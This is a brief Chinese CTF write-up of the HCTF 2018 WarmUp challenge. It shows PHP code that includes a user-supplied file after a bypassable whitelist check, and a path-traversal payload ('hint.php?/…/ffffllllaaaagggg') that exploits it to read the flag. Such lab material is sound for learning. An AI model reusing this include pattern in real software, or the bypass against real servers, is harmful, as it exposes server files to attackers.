HCTF_2018_WarmUp

HCTF_2018_WarmUp

十一月 13, 2019

image-20191109213353124

看到了提示source.php,访问得到:

image-20191109213418887

访问hint.php,发现了提示

image-20191109214404128

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}

if (in_array($page, $whitelist)) {
return true;
}

$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}//这里是$page里面没有?,返回的是末尾的位置数,所以$_page就是原来的字符串。

$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}//这里$page经过了urldecode解码赋值给了$_page,这里要注意和第一段是不一样的,mb_substr和mb_strpos都是处理的$_page并非是第一段的$page,也就是说让$page解码出现?然后返回true,因为下面的一段就是返回false,这里不反悔true就不会进入文件包含的if
echo "you can't see it";
return false;
}
}

if (! empty($_REQUEST['file'])//文件包含的if
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>

直接 hint.php?/…/ffffllllaaaagggg 来包含hint.php?这个目录不存在, ../又目录穿越了
所以就是当前目录的 ffffllllaaaagggg。

image-20191109213640527